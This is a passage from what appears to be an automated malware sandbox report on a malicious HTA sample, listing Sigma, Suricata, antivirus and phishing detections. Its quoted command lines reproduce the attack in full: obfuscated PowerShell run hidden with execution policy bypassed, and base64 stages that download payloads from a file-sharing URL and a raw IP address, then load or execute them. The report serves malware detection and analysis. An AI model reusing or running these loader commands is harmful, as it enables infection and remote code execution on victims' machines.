GVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", ProcessId: 2188, ProcessName: csc.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Sigma detected: Dynamic CSharp Compile Artefact
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", CommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0E
          Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(

          Data Obfuscation

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", ProcessId: 2188, ProcessName: csc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-28T07:18:04.397158+010028587951A Network Trojan was detected192.168.2.44973023.95.128.21580TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFAvira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted file
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaReversingLabs: Detection: 21%
          Source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.htaVirustotal: Detection: 29%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

          Phishing

          barindex
          Yara detected HtmlPhish44
          Source: Yara matchFile source: greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta, type: SAMPLE
          Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1703698894.000000000755E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.pdb source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.pdbJ source: powershell.exe, 00000009.00000002.1816997416.0000000003488000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRgx source: powershell.exe, 00000003.00000002.1705324938.000000000847D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B50000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
